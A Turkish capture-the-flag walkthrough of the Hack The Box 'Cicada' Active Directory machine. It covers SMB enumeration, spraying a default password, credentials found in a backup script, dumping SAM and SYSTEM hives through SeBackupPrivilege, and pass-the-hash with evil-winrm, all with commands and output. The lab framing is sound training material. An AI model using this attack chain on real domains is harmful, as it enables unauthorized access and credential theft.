If you have questions or need help with the machine, feel free to reach out to me, and I can also assist you in English.
Cicada, Hack The Box platformunda yer alan ve Active Directory (AD) güvenlik açıkları üzerine odaklanan bir makinedir. Eğer AD üzerinde çalışmak konusunda yeniyseniz, Cicada bu konuda pratik kazanmak için güzel bir makine.
Neler Yapacağız?
Makinemizi çözerken temel olarak Nmap, ZMap, Masscan vb. araçlar ile ağ taraması yapacağız. NetExec, enum4linux, CrackMapExec, ldapdomaindump vb, ile SMB, LDAP vb. protokollerin üzerinden bilgiler toplayacağız ve AD kullanıcılarını belirleyeceğiz. Daha sonra Evil-WinRM ve SecretsDump araçlarından ve elde ettiğimiz kullanıcıdaki SeBackupPriviliege yetkisinden faydalanarak user flag ve root flag’imize ulaşacağız.
— Port Taraması : Nmap ile Açık Portları Tespit Etme
İlk olarak, açık portları tespit etmek için nmap kullanıyoruz.
nmap -sV -sC -A --open -vvv -oN cicada.nmap 10.10.11.35- -sV: Açık portlarda çalışan hizmetlerin versiyon bilgilerini tespit eder.
- -sC: Nmap’in içindeki scriptleri (NSE) kullanarak güvenlik taraması yapar.
- — open: Yalnızca açık portları raporlar.
- -vvv: Tarama sürecinin ayrıntılı bir şekilde (-v en az detay, -vvv en çok detay olmak üzere 3 kademelidir.) gösterilmesini sağlar.
- -oN cicada.nmap: Tarama sonuçlarını “cicada.nmap” adlı bir dosyaya normal formatta kaydeder.
- 10.10.11.35: Tarama yapılacak hedef IP adresidir.
Nmap taramasının sonuçlarını inceleyelim.
Nmap 7.94SVN scan initiated Sun Oct 13 13:57:58 2024 as: /usr/lib/nmap/nmap --privileged -sV -sC --open -oN cicadatarama.nmap 10.10.11.35
Nmap scan report for 10.10.11.35
Host is up (0.063s latency).
Not shown: 989 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-10-13 17:58:10Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-10-13T17:58:52
|_ start_date: N/A
|_clock-skew: 4h00m00s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Oct 13 13:59:31 2024 -- 1 IP address (1 host up) scanned in 92.50 secondsSistemimizin Windows üzerinde çalıştığını ve SMB, LDAP, Kerberos gibi hizmetlere erişim sağlayabileceğimizi görüyoruz. Ayrıca, 88, 135, 139, 389 ve 445 gibi portların açık olması bunların üstüne gidebileceğimizi gösteriyor.
— SMB Erişimini Kontrol Etme ve LDAP Bilgilerini Toplama
Bu aşamada enum4linux ve smbclient’i kullanarak nelere erişebileceğimize bakalım.
enum4linux -a 10.10.11.35
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Oct 13 14:18:24 2024
================================( Nbtstat Information for 10.10.11.35 )================================
Looking up status of 10.10.11.35
No reply from 10.10.11.35
====================================( Session Check on 10.10.11.35 )====================================
[+] Server 10.10.11.35 allows sessions using username '', password ''
=================================( Getting domain SID for 10.10.11.35 )=================================
Domain Name: CICADA
Domain Sid: S-1-5-21-917908876-1423158569-3159038727
[+] Host is part of a domain (not a workgroup)enum4linux ile ulaştığımız çıktıda ‘Domain Sid’, ‘Domain Name’ gibi bazı temel bilgilere ulaştık. Ayrıca ‘ ‘’Server 10.10.11.35 allows sessions using username ‘’, password ‘’ ’ çıktısı da, kimlik doğrulama olmadan kısıtlı da olsa erişim sağlayabildiğimizi belirtiyor.
smbclient -L 10.10.11.35
Password for [WORKGROUP\emre]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
DEV Disk
HR Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.35 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup availablesmbclient ile ulaştığımız çıktıda, hedef sistemdeki paylaşılan klasörleri tespit ettik. Bu klasörlerin her birini tek tek deneyerek erişim sağlamaya çalışacağız.
(emre㉿localhost)-[~]
└─$ smbclient \\\\10.10.11.35\\DEV
Password for [WORKGROUP\emre]:
smb: \> ls
NT_STATUS_ACCESS_DENIED listing \*
smb: \> ^C
┌──(emre㉿localhost)-[~]
└─$ smbclient \\\\10.10.11.35\\ADMIN$
Password for [WORKGROUP\emre]:
tree connect failed: NT_STATUS_ACCESS_DENIED
┌──(emre㉿localhost)-[~]
└─$ smbclient \\\\10.10.11.35\\HR
Password for [WORKGROUP\emre]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Mar 14 12:29:09 2024
.. D 0 Thu Mar 14 12:21:29 2024
Notice from HR.txt A 1266 Wed Aug 28 17:31:48 2024
4168447 blocks of size 4096. 328255 blocks available
smb: \> mget *.txt
Get file Notice from HR.txt? y
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (4.9 KiloBytes/sec) (average 4.9 KiloBytes/sec)HR dizinine erişim iznimiz var ve bu dizinde Notice from HR.txt isimli bir dosya görüyoruz ve mget komutuyla localimize alıp inceliyoruz.
İndirme işlemini yaparken dosya adındaki boşluk karakterlerinden dolayı sorun yaşarsanız mget *.txt komutunu da kullanabilirsiniz.
Gördüğümüz dosyayı açtığımızda ise çalışanlara özel açılan hesaplara default yani varsayılan olarak verilen şifreyi bulduk. Şimdi ise varsayılan şifreyi değiştirmeyen bir kullanıcı aramamız gerekiyor. Bunun için önce kullanıcıların isimlerini bulmamız gerekiyor.
— SMB ve LDAP ile Active Directory (AD) Kullanıcı Hesaplarını Tespit Etme
SMB ile hedef bilgisayardaki kullanıcı adlarını tespit etmek için crackmapexec, enum4linux, msfconsole gibi araçları kullanabiliriz.
crackmapexec smb 10.10.11.35 -u 'guest -p '' --rid-brute crackmapexec kullanarak kullanıcıları tespit etmeye çalışalım ve sonuçları inceleyelim.
(emre㉿localhost)-[~]
└─$ crackmapexec smb 10.10.11.35 -u 'guest' -p '' --rid-brute
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\guest:
SMB 10.10.11.35 445 CICADA-DC 1101: CICADA\DnsAdmins (SidTypeAlias)
SMB 10.10.11.35 445 CICADA-DC 1102: CICADA\DnsUpdateProxy (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 1103: CICADA\Groups (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 1104: CICADA\john.smoulder (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1105: CICADA\sarah.dantelia (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1106: CICADA\michael.wrightson (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1108: CICADA\david.orelious (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1109: CICADA\Dev Support (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 1601: CICADA\emily.oscars (SidTypeUser)Şimdi bir wordlist oluşturup gördüğümüz kullanıcı adlarını bu listeye ekleyeceğiz. Sonra bu listedeki kullanıcılardan herhangi birinin varsayılan şifreyi değiştirip değiştirmediğini deneyeceğiz. Bu işlemi NetExec, Hydra, CrackMapExec, Medusa vb. gibi araçlarla yapabilirsiniz.
hydra -L kullanicilar.txt -p 'C***************' smb://10.10.11.35
crackmapexec smb 10.10.11.35 -u kullanicilar.txt -p 'C***************'
nxc smb 10.10.11.35 -u kullanicilar.txt -p 'C****************' (emre㉿localhost)-[~/Desktop]
└─$ crackmapexec smb 10.10.11.35 -u kullanicilar.txt -p 'C*******************'
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\emily.oscars:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\Dev Support:Cicada$M6Corpb*@Lp#nZp!8
┌──(emre㉿localhost)-[~/Desktop]
└─$ crackmapexec smb 10.10.11.35 -u kullanicilar.txt -p 'C****************' --continue-on-succes
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\emily.oscars:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\Dev Support:Cicada$M6Corpb*@Lp#nZp!8
SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\david.orelious:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE CrackMapExec çıktısında bazı kullanıcıların varsayılanda bulunan şifreyi değiştirmediğini tespit ettik. Şimdi bu kullanıcıları kullanarak daha fazla bilgi toplayalım.
ldapdomaindump 10.10.11.35 -u 'cicada\michael.wrightson' -p 'C*****************'ldapdomaindump aracını kullanarak Active Directory sunucusundaki dizin bilgilerini (kullanıcılar, gruplar vb.) çıkarıyoruz.
ldapdomaindump çıktımız olan domain_users.html’yi incelediğimizde description kısmında bir şey fark ediyoruz. Bir kullanıcı, şifresini buraya yazmış.
Şimdi ise daha önce yukarıda denediğimiz dizinlere tekrar erişim sağlamaya çalışacağız. Ancak bu sefer ‘guest’ olarak değil bulduğumuz kullanıcı adı ve şifreyle deneyeceğiz.
Önce “smbclient -L 10.10.11.35” yazıp dizinlerin neler olduğunu hatırlayalım, daha sonra da denemeye başlayalım.
(emre㉿localhost)-[~]
└─$ smbclient -L 10.10.11.35
Password for [WORKGROUP\emre]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
DEV Disk
HR Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
┌──(emre㉿localhost)-[~]
└─$ smbclient //10.10.11.35/IPC$ -U david.orelious
Password for [WORKGROUP\david.orelious]:
smb: \> ls -la
NT_STATUS_NO_SUCH_FILE listing \-la
smb: \> pwd
Current directory is \\10.10.11.35\IPC$\
smb: \> exit
┌──(emre㉿localhost)-[~]
└─$ smbclient //10.10.11.35/DEV -U david.orelious
Password for [WORKGROUP\david.orelious]:
smb: \> ls
. D 0 Thu Mar 14 12:31:39 2024
.. D 0 Thu Mar 14 12:21:29 2024
Backup_script.ps1 A 601 Wed Aug 28 17:28:22 2024
4168447 blocks of size 4096. 313587 blocks availablebulduğumuz kullanıcıyla DEV dizininin içerisine girdiğimize Backup_script.ps1 dosyasını bulduk. Şimdi bunu get Backup_script.ps1 komutu ile localimize alıp inceleyelim.
smb: \> mget Backup_script.ps1
Get file Backup_script.ps1? y
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (2.3 KiloBytes/sec) (average 2.3 KiloBytes/sec)
┌──(emre㉿localhost)-[~]
└─$ cat Backup_script.ps1
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q*****PASSWORD-HERE-********" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"Dosyayı incelediğimizde bunun bir yedekleme dosyası olduğunu fark ettik ve içerisinde ‘emily.oscars’ kullanıcısının parolasını bulduk. Şimdi bu kullanıcı ile bağlanıp dosyalara erişmeye çalışalım.
─(emre㉿localhost)-[~]
└─$ smbclient //10.10.11.35/C$ -U emily.oscars
Password for [WORKGROUP\emily.oscars]:
Try "help" to get a list of possible commands.
smb: \> ls
$Recycle.Bin DHS 0 Thu Mar 14 13:24:03 2024
$WinREAgent DH 0 Mon Sep 23 16:16:49 2024
Documents and Settings DHSrn 0 Thu Mar 14 19:40:47 2024
DumpStack.log.tmp AHS 12288 Sun Oct 13 16:29:59 2024
pagefile.sys AHS 738197504 Sun Oct 13 16:29:59 2024
PerfLogs D 0 Thu Aug 22 18:45:54 2024
Program Files DR 0 Thu Aug 29 19:32:50 2024
Program Files (x86) D 0 Sat May 8 09:40:21 2021
ProgramData DHn 0 Fri Aug 30 17:32:07 2024
Recovery DHSn 0 Thu Mar 14 19:41:18 2024
Shares D 0 Thu Mar 14 12:21:29 2024
System Volume Information DHS 0 Thu Mar 14 11:18:00 2024
temp D 0 Sun Oct 13 19:24:03 2024
Users DR 0 Mon Aug 26 20:11:25 2024
Windows D 0 Mon Sep 23 16:35:40 2024
4168447 blocks of size 4096. 314367 blocks available
smb: \Users\emily.oscars.CICADA\> cd Desktop\
smb: \Users\emily.oscars.CICADA\Desktop\> ls
. DR 0 Wed Aug 28 17:32:18 2024
.. D 0 Thu Aug 22 21:22:13 2024
user.txt AR 34 Sun Oct 13 20:58:27 2024
smb: \Users\emily.oscars.CICADA\Desktop\> pwd
Current directory is \\10.10.11.35\C$\Users\emily.oscars.CICADA\Desktop\
smb: \Users\emily.oscars.CICADA\Desktop\> get user.txt
getting file \Users\emily.oscars.CICADA\Desktop\user.txt of size 34 as user.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
┌──(emre㉿localhost)-[~]
└─$ cat user.txt
c9****************** <------ Soldaki değer bizim user flagimiz.Users dizininden ‘emily.oscars’ kullanıcısının masaüstüne eriştiğimizde ‘User Flag’imizi buluyoruz. Daha sonra Users Dizininden Administrator dizinine de gitmeyi deniyoruz ancak yetkimiz yetmiyor.
— SeBackupPrivilege ile Hash Elde Etme ve Pass the Hash”
Elimizdeki kullanıcı adı ve şifreyi kullanarak hedef sistemde daha iyi bir shell almak için evil-winrm’yi kullanalım ve kullanıcımızla ve yetkileriyle ilgili biraz bilgi toplayalım.
evil-winrm -i 10.10.11.35 -u emily.oscars -p 'Q!3*************'evil-winrm ile bağlanıp shell aldıktan sonra yapay zekanın da yardımıyla biraz deneme yapıp ihtiyacımız olan dosyayı arıyoruz.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> Get-ChildItem -Path "C:\Users\Administrator\Desktop"
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 10/13/2024 1:58 PM 34 root.txt
Aradığımız dosyanın nerde olduğunu bulduk ancak sadece Administrator yetkisiyle okuyabiliyoruz. Tekrardan işe yarar bir yol aramaya başlıyoruz.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> systeminfo
Program 'systeminfo.exe' failed to run: Access is denied
+ systeminfo
+ ~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (:) [], ApplicationFailedException
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
Sistem bilgilerine ve kullanıcımızın yetkilerine baktığımızda SeBackupPrivilege yetkisine sahip olduğumuzu görüyoruz. SeBackupPrivilege , kullanıcının dosyaları ve kayıt defteri verilerini yedekleme ve geri yükleme yetkisine sahip olması demektir.
Biraz dış kaynaklardan araştırma yaptığımızda bu yetkiyi kullanarak SAM ve SYSTEM dosyalarını evil-winrm kullanarak localimize alabileceğimizi öğreniyoruz.
- SAM: Windows’taki kullanıcı hesap bilgilerini ve parolaların hash değerlerini saklayan dosya.
- SYSTEM: Sistem yapılandırma ayarlarını ve kritik verileri depolayan dosya.
*Evil-WinRM* PS C:\> mdkir samsystem
*Evil-WinRM* PS C:\> cd samsystem
*Evil-WinRM* PS C:\samsystem\> reg save hklm\sam C:\samsystem\sam
*Evil-WinRM* PS C:\samsystem\> reg save hklm\system C:\samsystem\system
*Evil-WinRM* PS C:\samsystem\> download sam
Info: Downloading C:\samsystem\sam to sam
Info: Download succesful!
*Evil-WinRM* PS C:\samsystem\> download system
Info: Downloading C:\samsystem\system to system
Info: Download succesful!C:\ dizinin altına bir klasör açıp SAM ve SYSTEM dosyalarını buraya kopyalıyoruz. Daha sonra bunları evil-winrm toolumuzdaki download komutuyla localimize indiriyoruz.
Daha sonra secretsdump kullanarak indirdiğimiz SAM ve SYSTEM dosyalarındaki Administrator kullanıcısının hashini çıkarıyoruz.
─(emre㉿localhost)-[~/Desktop]
└─$ impacket-secretsdump -sam sam -system system LOCAL
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7*************f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...Administrator kullanıcımızın hash değerine ulaşıyoruz. Şimdi ise Pass the Hash dediğimiz tekniği kullanarak makineye bağlanıp root.txt dosyasını okuyalım.
(emre㉿localhost)-[~/Desktop]
└─$ evil-winrm -i 10.10.11.35 -u Administrator -H 2b8*****************41
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd C:\Users\Administrator\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 10/13/2024 3:05 PM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
c8e33f***************d378 <----- ROOT FLAG- H parametremiz, bağlantı kuracağımız kullanıcı adının şifresinin hash değerini belirtir. Bu durumda,
2b8*****************41ifademiz şifremizin hash değeri demektir. evil-winrm aracı ile bu hashi, kullanarak kimlik doğrulaması yapıyoruz ve böylece root flagimize de ulaşıyoruz.
